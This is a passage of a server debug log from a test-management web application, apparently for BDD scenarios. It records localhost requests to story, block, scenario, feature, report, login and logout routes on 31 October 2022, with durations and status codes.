debug: [1667208151211, duration: 15] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.384Z debug: [1667208154381, duration: 2] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.415Z debug: [1667208154413, duration: 2] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.442Z debug: [1667208154439, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.446Z debug: [1667208154444, duration: 2] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.472Z debug: [1667208154469, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.529Z debug: [1667208154430, duration: 99] GET:/stories/?repoName=HAH&source=db&id=6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:34.616Z debug: [1667208154556, duration: 59] GET:/stories/?repoName=HAH&source=db&id=6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:35.641Z debug: [1667208155636, duration: 2] GET:/getBlocks/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 200 +2022-10-31T09:22:35.671Z debug: [1667208155665, duration: 6] GET:/getBlocks/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:22:41.247Z debug: [1667208161245, duration: 1] GET:/getBlocks/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:07.339Z debug: [1667208187323, duration: 15] PUT:/6357a1fc42797f1390c87c73/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:09.106Z debug: [1667208189102, duration: 3] GET:/user/, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:09.116Z debug: [1667208189107, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:11.620Z debug: [1667208191617, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:11.660Z debug: [1667208191657, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:11.683Z debug: [1667208191679, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:11.728Z debug: [1667208191676, duration: 51] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:12.929Z debug: [1667208192926, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:12.959Z debug: [1667208192956, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:15.551Z debug: [1667208195549, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:27.351Z debug: [1667208207342, duration: 9] POST:/6357a1fc42797f1390c87c73/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:48.152Z debug: [1667208228144, duration: 8] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:48.174Z debug: [1667208228165, duration: 8] PUT:/6357a1fc42797f1390c87c73/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:48.225Z debug: [1667208228223, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:48.252Z debug: [1667208228248, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:48.255Z debug: [1667208228253, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:48.257Z debug: [1667208228241, duration: 16] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:48.283Z debug: [1667208228278, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:48.292Z debug: [1667208228284, duration: 8] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:55.148Z debug: [1667208235136, duration: 11] POST:/, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:55.219Z debug: [1667208235207, duration: 12] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-31T09:23:55.329Z debug: [1667208235326, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:23:55.361Z debug: [1667208235358, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:03.776Z debug: [1667208243774, duration: 2] GET:/user/, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:03.782Z debug: [1667208243772, duration: 10] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:07.529Z debug: [1667208247526, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:07.575Z debug: [1667208247572, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:07.601Z debug: [1667208247596, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:07.643Z debug: [1667208247591, duration: 52] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:24:08.685Z debug: [1667208248683, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:08.718Z debug: [1667208248715, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.596Z debug: [1667208254593, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.660Z debug: [1667208254657, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.690Z debug: [1667208254687, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.692Z debug: [1667208254677, duration: 15] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.723Z debug: [1667208254719, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.725Z debug: [1667208254721, duration: 3] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:14.735Z debug: [1667208254723, duration: 11] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:16.388Z debug: [1667208256373, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:16.404Z debug: [1667208256402, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:31.884Z debug: [1667208271878, duration: 5] PUT:/635f942bfa76542960ac129e/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:24:33.044Z debug: [1667208273033, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:33.049Z debug: [1667208273046, duration: 3] GET:/user/, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:36.747Z debug: [1667208276743, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:36.797Z debug: [1667208276793, duration: 4] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:36.818Z debug: [1667208276815, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:36.860Z debug: [1667208276812, duration: 47] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:38.140Z debug: [1667208278138, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:38.170Z debug: [1667208278167, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:42.040Z debug: [1667208282037, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:48.983Z debug: [1667208288979, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:49.052Z debug: [1667208289045, duration: 7] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:49.074Z debug: [1667208289071, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:49.079Z debug: [1667208289063, duration: 15] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-31T09:24:49.122Z debug: [1667208289116, duration: 5] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:49.126Z debug: [1667208289123, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:49.131Z debug: [1667208289110, duration: 19] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:50.400Z debug: [1667208290397, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:50.433Z debug: [1667208290430, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:51.489Z debug: [1667208291487, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T09:24:54.175Z debug: [1667208294171, duration: 3] POST:/background/update/635f942bfa76542960ac129e/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:25:15.374Z debug: [1667208297314, duration: 18060] POST:/Feature/635f942bfa76542960ac129e/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:25:15.517Z debug: [1667208315509, duration: 7] GET:/report/635f947bfa76542960ac12a0, reqOrigin: ::1, resCode: 200 +2022-10-31T09:25:35.817Z debug: [1667208321068, duration: 14749] POST:/Scenario/635f942bfa76542960ac129e/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:25:35.954Z debug: [1667208335950, duration: 3] GET:/report/635f948ffa76542960ac12a2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:26:45.181Z debug: [1667208405180, duration: 1] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T09:26:46.559Z debug: [1667208406476, duration: 83] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T09:26:46.653Z debug: [1667208406639, duration: 13] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:26:46.741Z debug: [1667208406739, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:26:47.027Z debug: [1667208407024, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:26:47.042Z debug: [1667208407000, duration: 42] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:26:47.103Z debug: [1667208407100, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:26:50.056Z debug: [1667208410054, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:26:50.128Z debug: [1667208410126, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:27:16.718Z debug: [1667208410943, duration: 25774] POST:/Scenario/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:27:16.864Z debug: [1667208436861, duration: 2] GET:/report/635f94f4fa76542960ac12a4, reqOrigin: ::1, resCode: 200 +2022-10-31T09:27:24.104Z debug: [1667208444093, duration: 11] POST:/, reqOrigin: ::1, resCode: 200 +2022-10-31T09:27:24.174Z debug: [1667208444163, duration: 11] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-31T09:27:37.710Z debug: [1667208457707, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:27:41.287Z debug: [1667208461285, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T09:27:56.986Z debug: [1667208463481, duration: 13504] POST:/Scenario/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:27:57.044Z debug: [1667208477041, duration: 3] GET:/report/635f951cfa76542960ac12a7, reqOrigin: ::1, resCode: 200 +2022-10-31T09:28:17.013Z debug: [1667208483845, duration: 13165] POST:/Scenario/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:28:17.123Z debug: [1667208497066, duration: 54] GET:/report/635f9530fa76542960ac12a9, reqOrigin: ::1, resCode: 200 +2022-10-31T09:29:53.814Z debug: [1667208593806, duration: 8] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:30:15.839Z debug: [1667208602573, duration: 13266] POST:/Scenario/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:30:15.902Z debug: [1667208615900, duration: 2] GET:/report/635f95a7fa76542960ac12ab, reqOrigin: ::1, resCode: 200 +2022-10-31T09:30:39.856Z debug: [1667208639846, duration: 10] PUT:/6357a21542797f1390c87c75/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T09:30:51.837Z debug: [1667208651827, duration: 9] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:32:11.189Z debug: [1667208731187, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:32:31.023Z debug: [1667208751017, duration: 6] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:32:32.954Z debug: [1667208752945, duration: 8] PUT:/6357a20842797f1390c87c74/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:32:45.378Z debug: [1667208662559, duration: 102818] POST:/Feature/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:32:46.033Z debug: [1667208766031, duration: 2] GET:/report/635f963dfa76542960ac12ad, reqOrigin: ::1, resCode: 200 +2022-10-31T09:33:46.105Z debug: [1667208826092, duration: 13] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:33:49.929Z debug: [1667208829921, duration: 7] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T09:33:52.201Z debug: [1667208831955, duration: 246] GET:/report/reporting_1667208662564, reqOrigin: ::1, resCode: 200 +2022-10-31T09:34:20.574Z debug: [1667208860572, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:34:20.628Z debug: [1667208860623, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:34:29.505Z debug: [1667208869496, duration: 9] PUT:/6357a21542797f1390c87c75/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T09:34:34.770Z debug: [1667208874759, duration: 11] PUT:/6357a21542797f1390c87c75/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T09:34:45.782Z debug: [1667208885774, duration: 8] PUT:/6357a21542797f1390c87c75/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T09:36:02.625Z debug: [1667208962618, duration: 5] POST:/635f94fcfa76542960ac12a5/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:37:16.045Z debug: [1667209036036, duration: 8] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:37:18.396Z debug: [1667209038393, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:18.494Z debug: [1667209038484, duration: 10] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:18.494Z debug: [1667209038485, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:18.524Z debug: [1667209038519, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:18.527Z debug: [1667209038520, duration: 7] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:18.543Z debug: [1667209038481, duration: 62] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:37:18.625Z debug: [1667209038585, duration: 40] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:20.547Z debug: [1667209040545, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:37:20.575Z debug: [1667209040568, duration: 7] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:38:57.972Z debug: [1667209137964, duration: 8] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T09:39:01.328Z debug: [1667209141033, duration: 294] GET:/report/reporting_1667208887873, reqOrigin: ::1, resCode: 200 +2022-10-31T09:39:24.735Z debug: [1667209164732, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:39:24.775Z debug: [1667209164773, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:40:36.273Z debug: [1667209236264, duration: 8] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:40:50.912Z debug: [1667209250898, duration: 14] PUT:/6357a21542797f1390c87c75/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T09:40:54.686Z debug: [1667209254675, duration: 11] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:41:21.818Z debug: [1667209281805, duration: 12] PUT:/6357a21542797f1390c87c75/db/4, reqOrigin: ::1, resCode: 200 +2022-10-31T09:42:14.864Z debug: [1667209334856, duration: 8] PUT:/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:43:23.594Z debug: [1667209403592, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T09:43:54.414Z debug: [1667209434398, duration: 8] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T09:43:56.889Z debug: [1667209436591, duration: 298] GET:/report/reporting_1667209285569, reqOrigin: ::1, resCode: 200 +2022-10-31T09:44:36.057Z debug: [1667209476054, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:44:36.089Z debug: [1667209476087, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:44:50.214Z debug: [1667209490205, duration: 9] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:45:19.376Z debug: [1667209519367, duration: 9] PUT:/6357a21542797f1390c87c75/db/3, reqOrigin: ::1, resCode: 200 +2022-10-31T09:47:53.615Z debug: [1667209673606, duration: 9] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 304 +2022-10-31T09:47:57.048Z debug: [1667209676705, duration: 343] GET:/report/reporting_1667209285569, reqOrigin: ::1, resCode: 200 +2022-10-31T09:48:11.187Z debug: [1667209691184, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:48:11.218Z debug: [1667209691214, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:48:57.692Z debug: [1667209737677, duration: 14] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:49:17.478Z debug: [1667209757468, duration: 9] PUT:/6357a21542797f1390c87c75/db/2, reqOrigin: ::1, resCode: 200 +2022-10-31T09:49:24.539Z debug: [1667209764525, duration: 13] GET:/reportHistory/6357a21542797f1390c87c75, reqOrigin: ::1, resCode: 200 +2022-10-31T09:49:26.702Z debug: [1667209766364, duration: 337] GET:/report/reporting_1667209557438, reqOrigin: ::1, resCode: 200 +2022-10-31T09:50:30.601Z debug: [1667209830588, duration: 13] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T09:50:37.347Z debug: [1667209837246, duration: 101] GET:/report/reporting_1667208483848, reqOrigin: ::1, resCode: 200 +2022-10-31T09:50:43.622Z debug: [1667209843618, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:50:43.644Z debug: [1667209843639, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:51:10.487Z debug: [1667209870393, duration: 91] GET:/report/reporting_1667208483848, reqOrigin: ::1, resCode: 200 +2022-10-31T09:51:27.927Z debug: [1667209887844, duration: 83] GET:/report/reporting_1667208483848, reqOrigin: ::1, resCode: 200 +2022-10-31T09:51:38.839Z debug: [1667209898836, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:51:38.868Z debug: [1667209898863, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:51:41.556Z debug: [1667209901547, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T09:51:43.293Z debug: [1667209903290, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:51:43.320Z debug: [1667209903318, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:52:05.485Z debug: [1667209925472, duration: 13] PUT:/6357a21542797f1390c87c75/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T09:52:12.917Z debug: [1667209907069, duration: 25848] POST:/Scenario/6357a20842797f1390c87c74/db/1, reqOrigin: ::1, resCode: 200 +2022-10-31T09:52:13.026Z debug: [1667209933023, duration: 3] GET:/report/635f9accfa76542960ac12b5, reqOrigin: ::1, resCode: 200 +2022-10-31T09:53:06.758Z debug: [1667209986743, duration: 13] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:53:40.250Z debug: [1667210020237, duration: 11] PUT:/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T09:53:47.707Z debug: [1667210027705, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:54:37.720Z debug: [1667210077718, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:54:47.230Z debug: [1667210087227, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:55:07.414Z debug: [1667210107402, duration: 12] PUT:/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T09:55:39.379Z debug: [1667210139366, duration: 12] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:55:45.033Z debug: [1667210145027, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:56:21.949Z debug: [1667210181946, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:29.301Z debug: [1667210189217, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T09:56:29.329Z debug: [1667210189321, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:29.371Z debug: [1667210189368, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:29.445Z debug: [1667210189432, duration: 11] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:29.447Z debug: [1667210189437, duration: 9] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:29.488Z debug: [1667210189440, duration: 48] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T09:56:34.750Z debug: [1667210194747, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:34.775Z debug: [1667210194767, duration: 7] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:38.320Z debug: [1667210198317, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:56:58.574Z debug: [1667210218569, duration: 5] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:57:41.692Z debug: [1667210261678, duration: 13] PUT:/6357a21542797f1390c87c75/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T09:57:56.808Z debug: [1667210276803, duration: 4] POST:/background/update/6357a20842797f1390c87c74/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:58:43.391Z debug: [1667210323388, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T09:58:46.005Z debug: [1667210325986, duration: 18] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T09:59:00.588Z debug: [1667210340570, duration: 14] PUT:/6357a21542797f1390c87c75/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T09:59:33.626Z debug: [1667210373610, duration: 15] PUT:/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T09:59:41.602Z debug: [1667210381590, duration: 11] PUT:/6357a21542797f1390c87c75/db/5, reqOrigin: ::1, resCode: 200 +2022-10-31T10:01:18.451Z debug: [1667210478439, duration: 11] PUT:/6357a21542797f1390c87c75/db/6, reqOrigin: ::1, resCode: 200 +2022-10-31T10:01:22.213Z debug: [1667210482192, duration: 20] PUT:/6357a21542797f1390c87c75/db/7, reqOrigin: ::1, resCode: 200 +2022-10-31T10:01:31.756Z debug: [1667210491742, duration: 13] PUT:/6357a21542797f1390c87c75/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T10:03:17.398Z debug: [1667210597386, duration: 12] PUT:/6357a21542797f1390c87c75/db/8, reqOrigin: ::1, resCode: 200 +2022-10-31T10:04:41.041Z debug: [1667210681022, duration: 18] POST:/6357a21542797f1390c87c75/db, reqOrigin: ::1, resCode: 200 +2022-10-31T10:04:45.822Z debug: [1667210685811, duration: 11] PUT:/6357a21542797f1390c87c75/db/9, reqOrigin: ::1, resCode: 200 +2022-10-31T10:04:53.788Z debug: [1667210693703, duration: 84] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T10:04:53.860Z debug: [1667210693851, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T10:04:53.937Z debug: [1667210693934, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:04:53.987Z debug: [1667210693985, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:04:54.019Z debug: [1667210694016, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:04:54.031Z debug: [1667210694006, duration: 24] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-31T10:04:55.718Z debug: [1667210695715, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:04:55.745Z debug: [1667210695743, duration: 2] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-31T10:05:43.464Z debug: [1667210743462, duration: 1] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:16.381Z debug: [1667210776297, duration: 83] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T10:06:16.470Z debug: [1667210776462, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:16.575Z debug: [1667210776573, duration: 2] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:16.711Z debug: [1667210776705, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:16.718Z debug: [1667210776712, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T10:06:16.766Z 